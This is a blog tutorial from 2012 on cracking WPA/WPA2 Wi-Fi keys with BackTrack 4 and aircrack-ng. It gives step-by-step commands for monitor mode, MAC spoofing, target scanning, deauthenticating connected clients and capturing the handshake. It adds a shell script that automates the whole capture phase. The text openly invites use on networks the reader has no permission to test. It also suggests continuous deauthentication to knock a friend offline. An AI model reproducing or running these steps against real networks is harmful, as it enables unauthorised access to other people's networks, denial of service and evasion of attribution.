
Sunday, 7 October 2012


Tutorial - Cracking WPA/WPA2 - Any OS - Tools included

Hello, and welcome to my guide! This is the first tutorial I have written, and I aim to make it a good one.


**This guide is intended for the sole purpose of penetration testing only**


First of all, here is what you need. I will cover each of these in more detail later.

You need:
-A wireless adapter whose driver supports monitor mode and packet injection (this guide uses one with the RTL8187 chipset)
-To be able to run BackTrack 4
-A good wordlist
-Access to a WPA/WPA2 network
-Network traffic (at least one client connected to the network)
-A weak wireless key, i.e. one that appears in your wordlist. The handshake only lets you test guesses offline; it does not reveal the key by itself.

Having the correct chipset
For the method shown here the adapter must support monitor mode and packet injection; the RTL8187 chipset is the one I use because the aircrack-ng suite supports it well. The easiest way to get one is to buy an ALFA AWUS036H wireless adapter. These are very popular among the hacker community as they have excellent range and the all-important RTL8187 chipset, which works with the aircrack-ng suite out of the box. They cost around £30, so if you are not prepared to get one, stop reading now.

If you are, here is a link to the manufacturer's website: Alfa

And here is a link to Amazon [UK]: Alfa on Amazon UK

The adapter has drivers for the common desktop operating systems.
Once you have your shiny new adapter, install the driver and have a play about!

If you don't want to get an Alfa, look here to try to find another compatible card.

Running BackTrack 4
BackTrack 4 is a Linux distro that specialises in penetration testing. It is not only good for wireless hacking; it has a large collection of tools for all sorts of activities. Two easy ways to run it are covered below.

Bootable USB drive
This is probably the easiest and quickest method, but it means sacrificing a 4GB USB stick. That is fine if you have one lying about; if not, you will need to buy one or use the live CD method.

First you need to install LiLi USB Creator, which writes .iso images to your memory stick. The program lets you select, download and install many different Linux distros, but what we are interested in is BackTrack 4 [which I will refer to as BT4 from now on].

Here is the download link: LiLi Live USB
Once downloaded, install the program and run it: pick the BT4 .iso, pick the stick and let it write. The program walks you through it, so I will not include screenshots here.

Creating a live CD
First you must download the BT4 .iso image [or the BackTrack 4 R1 .iso; this tutorial uses BT4].

You can download it from here: Backtrack

I have never done this myself, so I will just give you this search for how to burn an .iso to a DVD: http://www.google.co.uk/#sclient=psy&hl=en&safe=off&q=how+to+burn+.iso+&aq=f&aqi=g4g-o1&aql=&oq=&gs_rfai=&pbx=1&fp=818a8bd2053ae4a6 The rest is up to you.

Booting BT4
Once you have created your bootable device you need to boot into BT4. Turn on your computer with the device inserted and press the boot-menu key (F-something; it depends on your computer), then select your USB stick or CD and hit Enter.

Once in BT4 you may need to log in; use the username "root" and the password "toor". To load the GUI [desktop] type the command "startx". Now is also a convenient time to run "/etc/init.d/wicd start", which starts the built-in wireless manager (wicd).

Now that you are in BT4 the fun can commence! One more thing: BT4 ships with the rtl8187 kernel driver, so the AWUS036H normally works as soon as it is plugged in. If airmon-ng (below) does not list it, you will have to sort the driver out yourself.

Plug your adapter in and let's get going!

You will also need a good wordlist. I tried to upload one for you, but my computer crashed, so I am going to let you find one for yourself ;)
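Whatever wordlist you find, it is worth cleaning it up before the cracking step. WPA/WPA2-PSK passphrases are 8 to 63 printable ASCII characters, so any other line can never be the key and only costs cracking time, and stray carriage returns (Windows line endings) stop an otherwise correct line from matching. The script below is an added example, not part of the original tutorial; the function names, the file arguments and the sample wordlist built in the comments are my own.

```shell
#!/bin/sh
# Added example: normalise a wordlist before handing it to aircrack-ng.
# Only the standard tr/grep/awk/wc tools are used; no adapter is needed.

# prepare_wordlist <in> <out>
# Strips CRs, keeps only lines of 8..63 printable ASCII characters
# (the valid WPA/WPA2-PSK passphrase range), drops duplicates while
# keeping the original order, writes the result to <out> and prints
# the number of candidates kept.
prepare_wordlist() {
    tr -d '\r' < "$1" \
        | LC_ALL=C grep -E '^[ -~]{8,63}$' \
        | awk '!seen[$0]++' > "$2"
    wc -l < "$2" | tr -d ' '
}

# wordlist_has <list> <passphrase>
# Sanity check: is a passphrase you know (your own test network's key)
# actually in the cleaned list? A crack attempt with a list that lacks
# the key tells you nothing about the capture.
wordlist_has() {
    grep -Fxq -- "$2" "$1"
}

# Usage (assumed file names):
#   prepare_wordlist rockyou.txt rockyou-wpa.txt
#   wordlist_has rockyou-wpa.txt 'MyTestKey123' && echo "key present"
```

The filter is deliberately strict: the 802.11i passphrase is defined over printable ASCII, so a candidate containing other bytes is discarded rather than passed through for aircrack-ng to reject later.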

Safety First!!!
If you are practising on a network that you do not have permission to test [I don't know why you would ;)], it may be a good idea to spoof your MAC address. The MAC address is the hardware address of your wireless adapter (not an IP address); it is what identifies the adapter in any frame it sends under its own name, and it is easy to change in software.

First you need to determine your device names and modes. This is easily done by opening Konsole and running the following command:

Code:
airmon-ng
You should see something like this:
[Image: ic4Egk.png]
Here we can see all of my wireless devices and their chipsets. The first one is my AWUS036H, the second is my built-in wireless card. [You can tell by the RTL8187 chipset.]

We now need to put it into monitor mode with the following command. Where I put <interface> you need to put the name given to your RTL8187; as you can see, mine is "wlan0".

Code:
airmon-ng start <interface>
[Image: ic0vIc.png]
As you can see, "monitor mode enabled on mon0". airmon-ng creates a separate monitor interface on top of wlan0, so from now on the interface you should use is "mon0".

Now, on to hiding your tracks. The interface must be down while its address is changed; "macchanger -s" only shows the current MAC, "-m" sets the one you give it ("macchanger -r" would pick a random one instead).
Code:
ifconfig mon0 down
macchanger -s mon0
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
You should see something like this. Your MAC address will be different from mine, of course.
[Image: iiUhg.png]
Viewing available networks
Now we are ready to search for networks to target. Type the following command to scan for networks:
Code:
airodump-ng --encrypt WPA -a mon0
Here we dump the wireless networks around us with the airodump-ng command. "--encrypt WPA" shows only WPA-protected networks (if a network you know to be WPA2 is missing, run it again without this filter, as some versions treat WPA and WPA2 as separate filters), "-a" hides unassociated clients, so the client list only shows stations that are actually connected to an access point, which is what we want, and "mon0" is the interface to use.

[Image: iczJrO.png]

In this example "BTHomeHub2-NM6K" is my home hub, whose network key I am trying to obtain. As you can see, there is one client connected to it (DE:03:74:C7:33:8E).

Target acquisition
Once we have a WPA/WPA2 network with someone connected to it, we need to 'lock on'. To do this we add:
Code:
--bssid <bssid of the access point you wish to target>

You will also need to fix the channel, so the adapter stops hopping and misses nothing; to do this add:
Code:
-c <channel>
You also critically need to add:

Code:
-w <filename>
This writes everything captured, handshake included, to files named <filename>-01.cap (plus .csv and .kismet.csv side files) in the directory you ran the command from; the number goes up each time you rerun it.

All of that together looks like this for my example:
Code:
airodump-ng --bssid 00:23:4E:55:B3:84 -c 1 -w WPA mon0

And this is what it should look like:
[Image: iczPGm.png]
As you can see there are 3 clients connected. We now need to kick one off!

Obtaining the WPA handshake
This is the most important part of the process, as it is the only step that involves the users of the network. What we are trying to do is disconnect a client from the access point and then wait for it to reconnect. When it does, the client and the access point perform what is called the 4-way handshake. We want to witness that handshake, because it contains everything needed to test passphrase guesses offline and so recover the network key.

We do this by using aireplay-ng to kick the user offline and then waiting for them to reconnect, so that we can capture and analyse the handshake. Use the following command:
Code:
aireplay-ng --deauth 10 -a <bssid of access point> -c <mac address of client> <interface>
In my example the BSSID of my access point is 00:23:4E:55:B3:84 and the client I want to kick off is DE:03:74:C7:33:8E.

"--deauth" means "deauthenticate" [kick off]; the number after it defines how many bursts of deauthentication frames to send. I set it at 10, but you only really need one. If you are feeling mischievous, "--deauth 0" keeps sending them until you stop it, which denies that client Wi-Fi access for as long as it runs. Not the most effective attack, but still lol worthy. Wait till your mate has a 24 kill streak on MW2 and kick him....

So I open a new window, leave airodump-ng running, and in the new window type:
Code:
aireplay-ng --deauth 10 -a 00:23:4E:55:B3:84 -c DE:03:74:C7:33:8E mon0
It will look like this:
[Image: ic0nhC.png]
If it is successful, the airodump-ng window will display "WPA handshake: <bssid>" in the top right of the screen. You can see this in the image below.
[Image: ic4BUi.png]
If not, wait a while, as what we are waiting for is the client to reconnect. If it does not reconnect, try kicking a different client.
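The capture phase above (monitor mode, MAC change, locked-on airodump-ng, a directed deauth, then a check that a handshake actually landed in the capture) as a single script. This is an added example, not part of the original tutorial: it assumes the aircrack-ng suite and macchanger as found in BT4, uses tshark (assumed installed; its "-Y" display filter needs a reasonably recent version) to count EAPOL frames in the capture, and takes the interface names wlan0/mon0, the spoofed MAC 00:11:22:33:44:55 and the capture prefix WPA from the tutorial. Setting DRY_RUN=1 prints every command instead of running it, so the logic can be checked without an adapter.

```shell
#!/bin/sh
# Added example: the capture phase of the tutorial as one script.
# Assumes aircrack-ng (airmon-ng, airodump-ng, aireplay-ng), macchanger
# and tshark are installed and that it is run as root. DRY_RUN=1 prints
# every command instead of executing it.
set -u

DRY_RUN="${DRY_RUN:-0}"

# Execute a command, or just print it in dry-run mode.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Sleep only when really running (waiting is pointless in a dry run).
pause() {
    [ "$DRY_RUN" = "1" ] || sleep "$1"
}

# A MAC address / BSSID is six colon-separated hex octets.
valid_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# 2.4 GHz channels 1-14 (the AWUS036H is a 2.4 GHz adapter).
valid_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Monitor mode on the physical interface, then a spoofed MAC on the
# monitor interface it creates (same order as in the tutorial).
setup_monitor() {   # setup_monitor <phys_if> <mon_if> <spoofed_mac>
    valid_mac "$3" || { echo "setup_monitor: bad MAC $3" >&2; return 1; }
    run airmon-ng start "$1"
    run ifconfig "$2" down
    run macchanger -m "$3" "$2"
    run ifconfig "$2" up
}

# The locked-on airodump-ng command line (writes <prefix>-01.cap).
capture_cmd() {   # capture_cmd <bssid> <channel> <prefix> <mon_if>
    valid_mac "$1" && valid_channel "$2" || return 1
    printf 'airodump-ng --bssid %s -c %s -w %s %s\n' "$1" "$2" "$3" "$4"
}

# A directed deauth: <count> bursts aimed at one client of the target AP.
deauth_cmd() {   # deauth_cmd <bssid> <client> <count> <mon_if>
    valid_mac "$1" && valid_mac "$2" || return 1
    printf 'aireplay-ng --deauth %s -a %s -c %s %s\n' "$3" "$1" "$2" "$4"
}

# Number of EAPOL frames in a capture: a complete 4-way handshake is 4;
# aircrack-ng can work with two of them.
handshake_frames() {   # handshake_frames <capture.cap>
    tshark -r "$1" -Y eapol 2>/dev/null | wc -l | tr -d ' '
}

# main <bssid> <client_mac> <channel> [phys_if] [mon_if]
main() {
    bssid="$1"; client="$2"; chan="$3"
    phys="${4:-wlan0}"; mon="${5:-mon0}"; prefix="WPA"
    setup_monitor "$phys" "$mon" 00:11:22:33:44:55 || return 1
    cap=$(capture_cmd "$bssid" "$chan" "$prefix" "$mon") \
        || { echo "main: bad BSSID or channel" >&2; return 1; }
    deauth=$(deauth_cmd "$bssid" "$client" 5 "$mon") \
        || { echo "main: bad client MAC" >&2; return 1; }
    run $cap &                 # keep airodump-ng running in the background
    cap_pid=$!
    pause 5                    # let it settle on the channel first
    run $deauth                # kick the client ...
    pause 30                   # ... and give it time to reconnect
    kill "$cap_pid" 2>/dev/null || true
    if [ "$DRY_RUN" = "1" ]; then
        echo "dry run: would now count EAPOL frames in $prefix-01.cap"
    else
        n=$(handshake_frames "$prefix-01.cap")
        echo "EAPOL frames captured: $n (need at least 2; 4 = full handshake)"
        [ "$n" -ge 2 ]
    fi
}

if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

Run it as "./capture.sh 00:23:4E:55:B3:84 DE:03:74:C7:33:8E 1" for the tutorial's example target; the EAPOL count at the end is the same "WPA handshake" check airodump-ng shows in its top-right corner, just done from the saved file so it can be repeated after the fact.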

Cracking
I have written another in-depth thread about cracking the WPA handshake; it was originally going to be here, but it ended up too long. You can view the next part here.

Thanks for reading

